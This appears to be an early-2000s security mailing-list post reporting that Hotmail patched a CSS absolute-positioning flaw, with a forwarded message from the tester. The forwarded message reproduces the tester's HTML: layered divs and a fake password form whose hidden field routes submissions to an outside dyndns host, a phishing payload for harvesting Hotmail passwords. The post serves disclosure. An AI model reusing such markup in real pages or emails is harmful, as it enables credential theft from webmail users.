Microsoft has finally patched today the css/div hole in hotmail.
Absolute positionning in 'style' is now filtered with static.
Others web based mailers, sites with bookmark, forum etc ... should quickly
do the same.
Above, the original mail from wouter Westerveld who informed me.
Cheers,
Gregory Duchemin
Hello,
Hotmail has fixed the "css hotmail spoofing/ password recovery" bug. I
was just testing it, and at once, it didn't work anymore.
Hotmail will replace "positon: absolue" by "position: static". Here
below, there is a part of te source from what I sended to hotmail, and
of what hotmail made from it.
I don't know if I've to send this email to BugTraq, so please forward it
for me if you think that is nessecery.
Greets,
Wouter Westerveld
(16 jr, the Netherlands)
--------This is what i sended to Hotmail:----------------
<div align="left">
<div id="layer1" style="width:101%; height:950; position:absolute;
left:0px; top:0px; z-index:0;">
<div id="layer2" style="position:absolute; left:40; top:10;
z-index:0;">
-------This stood in the source of the Hotmail HTML-Page--------------
<div id="layer1" style="width:101%; height:950; position:static;
left:0px; top:0px; z-index:0;
">
<div id="layer2" style="position:static; left:40; top:10;
z-index:0;
">
<center>
<form name="passwordform2" action="http://64.4.16.250/cgi-bin/postrd/EN"
method="GET" target="_blank" AUTOCOMPLETE="OFF" >
<input type=hidden name="hm___action"
value="http%3a%2f%2flinuxbak%2edyndns%2eorg%2fcgi%2dbin%2fhotmail">
<table cellpadding=0 cellspacing=0 border=0 widthY0>
<tr>
<td colspan=2>
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
